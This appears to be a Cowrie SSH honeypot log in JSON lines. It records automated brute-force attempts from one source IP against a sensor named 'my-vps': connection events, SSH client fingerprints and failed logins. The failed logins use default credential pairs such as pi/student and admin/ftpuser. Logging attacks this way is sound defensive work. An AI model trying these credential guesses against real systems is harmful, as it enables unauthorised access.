{"eventid":"cowrie.login.failed","username":"pi","password":"student","message":"login attempt [pi/student] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.389008Z","src_ip":"87.120.191.13","session":"9b1d87d0d38c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.292978Z","src_ip":"87.120.191.13","session":"c5aef1afb90e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.307948Z","src_ip":"87.120.191.13","session":"39bcadfc2778"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.310498Z","src_ip":"87.120.191.13","session":"c9f177b3fa49"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.311513Z","src_ip":"87.120.191.13","session":"51bdcee9a50d"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":54902,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e18ae22f4a3","protocol":"ssh","message":"New connection: 87.120.191.13:54902 (1.2.3.4:22) [session: 2e18ae22f4a3]","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.328092Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":54918,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b4f289067be","protocol":"ssh","message":"New connection: 87.120.191.13:54918 (1.2.3.4:22) [session: 9b4f289067be]","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.333312Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":54926,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e5221790fdc","protocol":"ssh","message":"New connection: 87.120.191.13:54926 (1.2.3.4:22) [session: 4e5221790fdc]","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.340006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.348414Z","src_ip":"87.120.191.13","session":"2e18ae22f4a3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.349118Z","src_ip":"87.120.191.13","session":"2e18ae22f4a3"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":54928,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1b1f6a9824c","protocol":"ssh","message":"New connection: 87.120.191.13:54928 (1.2.3.4:22) [session: a1b1f6a9824c]","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.352496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.362159Z","src_ip":"87.120.191.13","session":"4e5221790fdc"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.364011Z","src_ip":"87.120.191.13","session":"4e5221790fdc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.372814Z","src_ip":"87.120.191.13","session":"9b4f289067be"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.373339Z","src_ip":"87.120.191.13","session":"9b4f289067be"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.375041Z","src_ip":"87.120.191.13","session":"4a21adf47564"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.402497Z","src_ip":"87.120.191.13","session":"a1b1f6a9824c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.403229Z","src_ip":"87.120.191.13","session":"a1b1f6a9824c"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":54932,"dst_ip":"1.2.3.4","dst_port":22,"session":"263eff18af3f","protocol":"ssh","message":"New connection: 87.120.191.13:54932 (1.2.3.4:22) [session: 263eff18af3f]","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.405819Z"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.413966Z","src_ip":"87.120.191.13","session":"9d079a227ae2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.434931Z","src_ip":"87.120.191.13","session":"9b1d87d0d38c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.444483Z","src_ip":"87.120.191.13","session":"263eff18af3f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.445028Z","src_ip":"87.120.191.13","session":"263eff18af3f"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":54934,"dst_ip":"1.2.3.4","dst_port":22,"session":"72150c61603b","protocol":"ssh","message":"New connection: 87.120.191.13:54934 (1.2.3.4:22) [session: 72150c61603b]","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.451728Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":54938,"dst_ip":"1.2.3.4","dst_port":22,"session":"58a2c24fbc18","protocol":"ssh","message":"New connection: 87.120.191.13:54938 (1.2.3.4:22) [session: 58a2c24fbc18]","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.466324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.487927Z","src_ip":"87.120.191.13","session":"72150c61603b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.488732Z","src_ip":"87.120.191.13","session":"72150c61603b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.507643Z","src_ip":"87.120.191.13","session":"58a2c24fbc18"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.508305Z","src_ip":"87.120.191.13","session":"58a2c24fbc18"}
{"eventid":"cowrie.login.failed","username":"noc","password":"ftpuser","message":"login attempt [noc/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.554562Z","src_ip":"87.120.191.13","session":"2e18ae22f4a3"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ftpuser","message":"login attempt [ubnt/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.564512Z","src_ip":"87.120.191.13","session":"9b4f289067be"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.597259Z","src_ip":"87.120.191.13","session":"4e5221790fdc"}
{"eventid":"cowrie.login.failed","username":"student","password":"ftpuser","message":"login attempt [student/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.637244Z","src_ip":"87.120.191.13","session":"a1b1f6a9824c"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.667425Z","src_ip":"87.120.191.13","session":"263eff18af3f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ftpuser","message":"login attempt [admin/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.746988Z","src_ip":"87.120.191.13","session":"72150c61603b"}
{"eventid":"cowrie.login.failed","username":"pi","password":"ftpuser","message":"login attempt [pi/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:34.770129Z","src_ip":"87.120.191.13","session":"58a2c24fbc18"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.632734Z","src_ip":"87.120.191.13","session":"2e18ae22f4a3"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":54950,"dst_ip":"1.2.3.4","dst_port":22,"session":"69c987e3868f","protocol":"ssh","message":"New connection: 87.120.191.13:54950 (1.2.3.4:22) [session: 69c987e3868f]","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.664149Z"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.671658Z","src_ip":"87.120.191.13","session":"9b4f289067be"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.683858Z","src_ip":"87.120.191.13","session":"4e5221790fdc"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":54958,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c4758ebeeb7","protocol":"ssh","message":"New connection: 87.120.191.13:54958 (1.2.3.4:22) [session: 6c4758ebeeb7]","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.709088Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":54972,"dst_ip":"1.2.3.4","dst_port":22,"session":"582605073ff0","protocol":"ssh","message":"New connection: 87.120.191.13:54972 (1.2.3.4:22) [session: 582605073ff0]","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.714299Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.715547Z","src_ip":"87.120.191.13","session":"a1b1f6a9824c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.726142Z","src_ip":"87.120.191.13","session":"69c987e3868f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.727464Z","src_ip":"87.120.191.13","session":"69c987e3868f"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":54974,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffd83af5f7d2","protocol":"ssh","message":"New connection: 87.120.191.13:54974 (1.2.3.4:22) [session: ffd83af5f7d2]","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.748745Z"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.750990Z","src_ip":"87.120.191.13","session":"263eff18af3f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.776139Z","src_ip":"87.120.191.13","session":"6c4758ebeeb7"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.776681Z","src_ip":"87.120.191.13","session":"6c4758ebeeb7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.781312Z","src_ip":"87.120.191.13","session":"582605073ff0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:35.781762Z","src_ip":"87.120.191.13","session":"582605073ff0"}
